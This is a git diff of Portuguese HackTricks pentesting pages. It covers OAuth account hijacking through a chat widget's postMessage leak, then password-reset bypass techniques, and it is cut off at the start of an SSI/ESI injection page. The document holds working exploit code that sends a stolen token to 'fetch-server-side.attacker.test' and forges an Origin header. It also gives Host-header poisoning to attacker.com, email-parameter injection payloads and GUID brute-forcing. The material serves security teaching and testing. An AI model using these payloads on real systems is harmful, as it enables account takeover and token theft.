1. Se nenhum chat-api-token tiver sido enviado ainda, o widget de chat criará um e o colocará no localStorage de sua própria origem e o enviará por postMessage para a janela pai.
2. A janela pai fará uma chamada de API para o serviço de chat. O endpoint da API estava restrito pelo CORS ao site específico configurado para o serviço. Você precisava fornecer um cabeçalho `Origin` válido para a chamada de API com o chat-api-token para permitir que a solicitação fosse enviada.
3. A chamada de API da janela principal conteria `location.href` e o registraria como a "página atual" do visitante com o chat-api-token. A resposta então conteria tokens para se conectar a um websocket para iniciar a sessão de chat:
```json
{
"api_data": {
"current_page": "https://example.com/#access_token=test",
"socket_key": "xxxyyyzzz",
...
}
}
```
Neste exemplo, percebi que o anúncio do chat-api-token sempre seria anunciado ao pai do iframe do widget de chat e, se eu obtivesse o chat-api-token, poderia fazer uma solicitação do lado do servidor usando o token e, em seguida, adicionar meu próprio cabeçalho `Origin` artificial à chamada de API, já que um cabeçalho CORS só importa para um navegador. Isso resultou na seguinte cadeia:
1. Criei uma página maliciosa que incorpora um iframe do widget de chat, adicionou um ouvinte de postMessage para ouvir o chat-api-token. Além disso, acionei um evento para recarregar o iframe se eu não tivesse recebido o api-token em 2 segundos. Isso foi para garantir que eu também suportasse as vítimas que nunca iniciaram o chat e, como eu poderia acionar a abertura do chat remotamente, primeiro precisava do chat-api-token para começar a pesquisar os dados no chat-API do lado do servidor.
```html
<div id="leak"><iframe
id="i" name="i"
src="https://chat-widget.example.com/chat" onload="reloadToCheck()"></iframe></div>
<script>
var gotToken = false;
function reloadToCheck() {
if (gotToken) return;
setTimeout(function() {
document.getElementById('i').src = 'https://chat-widget.example.com/chat?' + Math.random();
}, 2000);
}
window.onmessage = function(e) {
if (e.data.key === 'api-token') {
gotToken = true;
lookInApi(e.data.value);
}
}
launchChatWindowByPostMessage();
</script>
```
2. Adicionei um link à página maliciosa para abrir o fluxo de login que acabaria na página com o widget de chat com o token na URL:
```
<a href="#" onclick="b=window.open('https://accounts.google.com/o/oauth2/auth/oauthchooseaccount?...');">Clique aqui para sequestrar o token</a>
```
3. A função `launchChatWindowByPostMessage()` continuamente enviará uma mensagem postMessage para a janela principal, se aberta, para lançar o widget de chat:
```javascript
function launchChatWindowByPostMessage() {
var launch = setInterval(function() {
if(b) { b.postMessage({type: 'launch-chat'}, '*'); }
}, 500);
}
```
4. Quando a vítima clicou no link e acabou na página de erro, o chat seria iniciado e um chat-api-token seria criado. Minha recarga do iframe do widget de chat na página maliciosa obteria o `api-token` por meio de postMessage e eu poderia então começar a procurar no API a URL atual da vítima:
```javascript
function lookInApi(token) {
var look = setInterval(function() {
fetch('https://fetch-server-side.attacker.test/?token=' + token).then(e => e.json()).then(e => {
if (e &&
e.api_data &&
e.api_data.current_url &&
e.api_data.current_url.indexOf('access_token') !== -1) {
var payload = e.api_data.current_url
document.getElementById('leak').innerHTML = 'Atacante agora tem o token: ' + payload;
clearInterval(look);
}
});
}, 2000);
}
```
5. A página do lado do servidor em `https://fetch-server-side.attacker.test/?token=xxx` faria a chamada de API com o cabeçalho Origin adicionado para fazer o Chat-API pensar que eu estava usando-o como uma origem legítima:
```javascript
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function getDataFromChatApi(token) {
return await fetch('https://chat-widget.example.com/api', {headers:{Origin: 'https://example.com', 'Chat-Api-Token': token}});
}
function handleRequest(request) {
const token = request.url.match('token=([^&#]+)')[1] || null;
return token ? getDataFromChatApi(token) : null;
}
```
6. Quando a vítima clicou no link e passou pela dança do OAuth e pousou na página de erro com o token adicionado, o widget de chat de repente apareceria, registraria a URL atual e o atacante teria o token de acesso da vítima.
## Outras ideias para vazar URLs
Ainda existem diferentes tipos de gadgets esperando para serem encontrados. Aqui está um desses casos que não consegui encontrar na natureza, mas poderia ser uma maneira potencial de obter a URL para vazar usando qualquer um dos modos de resposta disponíveis.
### Uma página em um domínio que roteia qualquer postMessage para seu opener
Como todos os tipos de resposta `web_message` não podem validar nenhum caminho da origem, qualquer URL em um domínio válido pode receber a postMessage com o token. Se houver algum tipo de ouvinte de postMessage-proxy em uma das páginas do domínio, que recebe qualquer mensagem enviada para ele e envia tudo para seu `opener`, posso fazer uma cadeia de window.open dupla:
Página do atacante 1:
```html
<a href="#" onclick="a=window.open('attacker2.html'); return false;">Accept cookies</a>
```
Página do Atacante 2:
```html
<a href="#" onclick="b=window.open('https://accounts.google.com/oauth/...?', '', 'x'); location.href = 'https://example.com/postmessage-proxy'; return false;">Login to google</a>
```
E o `https://example.com/postmessage-proxy` teria algo parecido com:
```javascript
// Proxy all my messages to my opener:
window.onmessage=function(e) { opener.postMessage(e.data, '*'); }
```
Eu poderia usar qualquer um dos modos de resposta `web_message` para enviar o token do provedor OAuth para a origem válida `https://example.com`, mas o endpoint enviaria o token para `opener`, que é a página do atacante.
Esse fluxo pode parecer improvável e requer dois cliques: um para criar um relacionamento de abertura entre o atacante e o site e o segundo para iniciar o fluxo OAuth tendo o site legítimo como o abridor do pop-up OAuth.
O provedor OAuth envia o token para a origem legítima:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget4-example1.png)
E a origem legítima tem o proxy postMessage para seu abridor:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget4-example2.png)
O que faz com que o atacante obtenha o token:
![](https://labs.detectify.com/wp-content/uploads/2022/06/gadget4-example3.png)
**Confira o post [https://labs.detectify.com/2022/07/06/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url](https://labs.detectify.com/2022/07/06/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Deseja ver sua **empresa anunciada no HackTricks**? ou deseja ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

409
pentesting-web/reset-password.md
View file

@ -1,16 +1,16 @@
# Bypass de Senha Reset/Esquecida
# Bypass de Redefinição/Esquecimento de Senha
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
@ -18,308 +18,139 @@ Outras formas de apoiar o HackTricks:
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de recompensas por bugs!
**Insights de Hacking**\
Engaje-se com conteúdo que explora a emoção e os desafios do hacking
**Percepções de Hacking**\
Envolver-se com conteúdo que explora a emoção e os desafios do hacking
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e insights em tempo real
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e percepções em tempo real
**Últimos Anúncios**\
Fique informado sobre os mais novos bounties de bugs lançados e atualizações cruciais da plataforma
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje mesmo!
A seguinte compilação de técnicas foi retirada de [https://anugrahsr.github.io/posts/10-Password-reset-flaws/](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
## Vazamento do Token de Reset de Senha Via Referer
O **HTTP referer** é um campo opcional do cabeçalho HTTP que identifica o endereço da página da web que está vinculada ao recurso que está sendo solicitado. O cabeçalho de requisição Referer contém o endereço da página web anterior de onde foi seguido um link para a página atualmente solicitada.
![](https://www.optimizesmart.com/wp-content/uploads/2020/01/1-1-2.jpg)
### Exploração
* Solicite o reset de senha para o seu endereço de e-mail
* Clique no link de reset de senha
* Não altere a senha
* Clique em qualquer site de terceiros (ex: Facebook, Twitter)
* Intercepte a requisição no proxy do Burpsuite
* Verifique se o cabeçalho referer está vazando o token de reset de senha.
### Impacto
Permite que a pessoa que tem controle de um site específico altere a senha do usuário (ataque CSRF), porque essa pessoa conhece o token de reset de senha do usuário.
### Referência:
* https://hackerone.com/reports/342693
* https://hackerone.com/reports/272379
* https://hackerone.com/reports/737042
* https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
* https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
## Envenenamento de Reset de Senha
Se você encontrar um ataque ao cabeçalho do host e ele estiver fora do escopo, tente encontrar o botão de reset de senha!
![](https://portswigger.net/web-security/images/password-reset-poisoning.svg)
### Exploração
* Intercepte a requisição de reset de senha no Burpsuite
* Adicione o seguinte cabeçalho ou edite o cabeçalho no Burpsuite (tente um por um)
```
Host: attacker.com
```
```
Host: target.com
X-Forwarded-Host: attacker.com
```
```
Host: target.com
Host: attacker.com
```
* Verifique se o link para alterar a senha dentro do e-mail está apontando para attacker.com
### Correção
Use `$_SERVER['SERVER_NAME']` em vez de `$_SERVER['HTTP_HOST']`
```php
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
```
### Impacto
A vítima receberá o link malicioso em seu e-mail e, ao clicar, irá vazar o link/token de redefinição de senha do usuário para o atacante, levando à tomada total da conta.
### Referência:
* https://hackerone.com/reports/226659
* https://hackerone.com/reports/167631
* https://www.acunetix.com/blog/articles/password-reset-poisoning/
* https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
* https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
## Redefinição de Senha Manipulando o Parâmetro de Email
### Exploração
* Adicionar e-mail do atacante como segundo parâmetro usando &
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
* Adicione o e-mail do atacante como segundo parâmetro usando %20
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
* Adicione o e-mail do atacante como segundo parâmetro usando |
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
* Adicione o e-mail do atacante como segundo parâmetro usando cc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
* Adicione o email do atacante como segundo parâmetro usando bcc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
* Adicione o e-mail do atacante como segundo parâmetro usando ,
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
* Adicione o e-mail do atacante como segundo parâmetro no array json
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
### Referência
* https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
* https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
* https://twitter.com/HusseiN98D/status/1254888748216655872
## Alterando o Email e Senha de qualquer Usuário através de Parâmetros da API
### Exploração
* O atacante deve fazer login com sua conta e acessar a função de Mudar senha
* Iniciar o Burp Suite e Intercept a requisição
* Após interceptar a requisição, enviá-la para o repetidor e modificar os parâmetros Email e Senha
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
### Referência
* https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
### Sem Limitação de Taxa: Bombardeio de Email <a href="#5-no-rate-limiting-email-bombing" id="5-no-rate-limiting-email-bombing"></a>
### Exploração
* Inicie o Burp Suite e Intercepte a solicitação de redefinição de senha
* Envie para o intruso
* Use carga útil nula
### Referência
* https://hackerone.com/reports/280534
* https://hackerone.com/reports/794395
## Descubra Como o Token de Redefinição de Senha é Gerado
Descubra o padrão do token de redefinição de senha
![](https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSvCcLcUTksGbpygrJB4III5BTBYEzYQfKJyg\&usqp=CAU)
Se ele
* Gerado com base no Timestamp
* Gerado com base no UserID
* Gerado com base no email do Usuário
* Gerado com base no Primeiro e Último nome
* Gerado com base na Data de Nascimento
* Gerado com base em Criptografia
Use o Burp Sequencer para encontrar a aleatoriedade ou previsibilidade dos tokens.
## GUID Adivinhável
Existem diferentes tipos de GUIDs:
* **Versão 0:** Apenas visto no GUID nulo ("00000000-0000-0000-0000-000000000000").
* **Versão 1:** O GUID é gerado de maneira previsível com base em:
* O momento atual
* Uma "sequência de relógio" gerada aleatoriamente que permanece constante entre os GUIDs durante o tempo de atividade do sistema gerador
* Um "ID de nó", que é gerado com base no endereço MAC do sistema, se disponível
* **Versão 3:** O GUID é gerado usando um hash MD5 de um nome e namespace fornecidos.
* **Versão 4:** O GUID é gerado aleatoriamente.
* **Versão 5:** O GUID é gerado usando um hash SHA1 de um nome e namespace fornecidos.
É possível olhar para um GUID e descobrir sua versão, existe uma pequena ferramenta para isso: [**guidtool**](https://github.com/intruder-io/guidtool)****
```http
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
```
Se a versão utilizada para gerar um GUID de redefinição de senha for a versão 1, é possível forçar bruta dos GUIDS:
```http
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
```
### Referências
* [https://www.intruder.io/research/in-guid-we-trust](https://www.intruder.io/research/in-guid-we-trust)
## Manipulação de resposta: Substituir resposta ruim por uma boa
Procure por Requisição e Resposta como estas
```php
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
```
Mudança de Resposta
```php
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
```
### Referência
* https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
### Usando Token Expirado <a href="#8-using-expired-token" id="8-using-expired-token"></a>
* Verifique se o token expirado pode ser reutilizado
### Força Bruta no Token de Redefinição de Senha <a href="#9-brute-force-password-rest-token" id="9-brute-force-password-rest-token"></a>
Tente forçar a descoberta do token de redefinição usando Burpsuite
```php
POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
```
* Use o IP-Rotator no burpsuite para contornar o limite de taxa baseado em IP.
### Referência
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
### Tente Usar Seu Token <a href="#10-try-using-your-token" id="10-try-using-your-token"></a>
* Tente adicionar seu token de redefinição de senha com a conta da vítima
```php
POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$
```
### Referência
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
## Invalidação de Sessão no Logout/Reset de Senha
Quando um usuário **faz logout ou redefine sua senha**, a sessão atual deve ser invalidada.\
Portanto, **capture os cookies** enquanto o usuário está logado, **faça logout** e **verifique** se os **cookies** ainda estão **válidos**.\
Repita o processo **mudando a senha** em vez de fazer logout.
## Tempo de Expiração do Token de Reset
Os **tokens de reset devem ter um tempo de expiração**, após isso o token não deve ser válido para alterar a senha de um usuário.
## Verificações Extras
* Use username@burp\_collab.net e analise o callback
* Usuário cópia de carbono email=victim@mail.com%0a%0dcc:hacker@mail.com
* Senha longa (>200) leva a DoS
* Anexe segundo parâmetro de email e valor
Fique informado sobre os mais recentes lançamentos de recompensas por bugs e atualizações cruciais na plataforma
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
## **Vazamento de Token de Redefinição de Senha Via Referenciador**
* O cabeçalho HTTP referer pode vazar o token de redefinição de senha se estiver incluído na URL. Isso pode ocorrer quando um usuário clica em um link de um site de terceiros após solicitar uma redefinição de senha.
* **Impacto**: Possível tomada de conta da conta via ataques de Cross-Site Request Forgery (CSRF).
* **Referências**:
- [Relatório HackerOne 342693](https://hackerone.com/reports/342693)
- [Relatório HackerOne 272379](https://hackerone.com/reports/272379)
- [Artigo de Vazamento de Token de Redefinição de Senha](https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a)
## **Envenenamento de Redefinição de Senha**
* Os atacantes podem manipular o cabeçalho Host durante as solicitações de redefinição de senha para apontar o link de redefinição para um site malicioso.
* **Correção**: Use `$_SERVER['SERVER_NAME']` para construir URLs de redefinição de senha em vez de `$_SERVER['HTTP_HOST']`.
* **Impacto**: Leva à possível tomada de conta vazando tokens de redefinição para os atacantes.
* **Passos de Mitigação**:
- Valide o cabeçalho Host em relação a uma lista branca de domínios permitidos.
- Use métodos seguros do lado do servidor para gerar URLs absolutos.
* **Referências**:
- [Artigo da Acunetix sobre Envenenamento de Redefinição de Senha](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
## **Redefinição de Senha Manipulando Parâmetro de Email**
* Os atacantes podem manipular a solicitação de redefinição de senha adicionando parâmetros de email adicionais para desviar o link de redefinição.
* **Passos de Mitigação**:
- Analise e valide corretamente os parâmetros de email do lado do servidor.
- Use declarações preparadas ou consultas parametrizadas para evitar ataques de injeção.
* **Referências**:
- [Takeover de Conta Readme.com](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
## **Alteração de Email e Senha de Qualquer Usuário através de Parâmetros de API**
* Os atacantes podem modificar os parâmetros de email e senha em solicitações de API para alterar as credenciais da conta.
* **Passos de Mitigação**:
- Garanta validação rigorosa de parâmetros e verificações de autenticação.
- Implemente registro e monitoramento robustos para detectar e responder a atividades suspeitas.
* **Referência**:
- [Takeover Completo de Conta via Manipulação de Parâmetros de API](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
## **Sem Limitação de Taxa: Bombardeio de Email**
* A falta de limitação de taxa em solicitações de redefinição de senha pode levar a um bombardeio de emails, sobrecarregando o usuário com emails de redefinição.
* **Passos de Mitigação**:
- Implemente limitação de taxa com base no endereço IP ou na conta do usuário.
- Use desafios CAPTCHA para evitar abusos automatizados.
* **Referências**:
- [Relatório HackerOne 280534](https://hackerone.com/reports/280534)
## **Descubra Como o Token de Redefinição de Senha é Gerado**
* Compreender o padrão ou método por trás da geração de tokens pode levar à previsão ou força bruta de tokens.
* **Passos de Mitigação**:
- Use métodos criptográficos fortes para a geração de tokens.
- Garanta aleatoriedade e comprimento suficientes para evitar previsibilidade.
* **Ferramentas**: Use o Burp Sequencer para analisar a aleatoriedade dos tokens.
## **GUID Adivinhável**
* Se GUIDs (por exemplo, versão 1) forem adivinháveis ou previsíveis, os atacantes podem forçá-los para gerar tokens de redefinição válidos.
* **Passos de Mitigação**:
- Use GUID versão 4 para aleatoriedade ou implemente medidas de segurança adicionais para outras versões.
* **Ferramentas**: Use [guidtool](https://github.com/intruder-io/guidtool) para analisar e gerar GUIDs.
## **Manipulação de Resposta: Substituir Resposta Ruim por Boa**
* Manipulação de respostas HTTP para contornar mensagens de erro ou restrições.
* **Passos de Mitigação**:
- Implemente verificações do lado do servidor para garantir a integridade da resposta.
- Use canais de comunicação seguros como HTTPS para evitar ataques de homem-no-meio.
* **Referência**:
- [Bug Crítico em Evento de Caça ao Bug ao Vivo](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
## **Usando Token Expirado**
* Testar se tokens expirados ainda podem ser usados para redefinição de senha.
* **Passos de Mitigação**:
- Implemente políticas estritas de expiração de token e valide a expiração do token do lado do servidor.
## **Força Bruta no Token de Redefinição de Senha**
* Tentativa de força bruta no token de redefinição usando ferramentas como Burpsuite e IP-Rotator para contornar limites de taxa baseados em IP.
* **Passos de Mitigação**:
- Implemente mecanismos robustos de limitação de taxa e bloqueio de conta.
- Monitore atividades suspeitas indicativas de ataques de força bruta.
## **Tente Usar Seu Token**
* Testar se o token de redefinição de um atacante pode ser usado em conjunto com o email da vítima.
* **Passos de Mitigação**:
- Garanta que os tokens estejam vinculados à sessão do usuário ou a outros atributos específicos do usuário.
## **Invalidação de Sessão em Logout/Redefinição de Senha**
* Garantir que as sessões sejam invalidadas quando um usuário faz logout ou redefine sua senha.
* **Passos de Mitigação**:
- Implemente um gerenciamento adequado de sessões, garantindo que todas as sessões sejam invalidadas ao fazer logout ou redefinir a senha.
## **Tempo de Expiração do Token de Redefinição**
* Os tokens de redefinição devem ter um tempo de expiração após o qual se tornam inválidos.
* **Passos de Mitigação**:
- Defina um tempo de expiração razoável para os tokens de redefinição e aplique estritamente do lado do servidor.
## **Verificações Extras**
* Métodos adicionais para testar vulnerabilidades, como usar formatos de email especiais ou senhas longas para causar um potencial Negação de Serviço (DoS).
* **Passos de Mitigação**:
- Realize validação de entrada e aplique limites de comprimento para evitar abusos.
# Referências
* [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de recompensas por bugs!
**Insights de Hacking**\
Interaja com conteúdo que explora a emoção e os desafios do hacking
**Percepções de Hacking**\
Envolver-se com conteúdo que explora a emoção e os desafios do hacking
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e insights em tempo real
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e percepções em tempo real
**Últimos Anúncios**\
Fique informado com os mais novos bounties de bugs lançados e atualizações cruciais da plataforma
Fique informado sobre os mais recentes lançamentos de recompensas por bugs e atualizações cruciais na plataforma
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

91
pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View file

@ -1,39 +1,41 @@
# Injeção de Inclusão no Lado do Servidor/Inclusão no Lado da Borda
# Injeção de Inclusão do Lado do Servidor/Inclusão do Lado do Edge
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
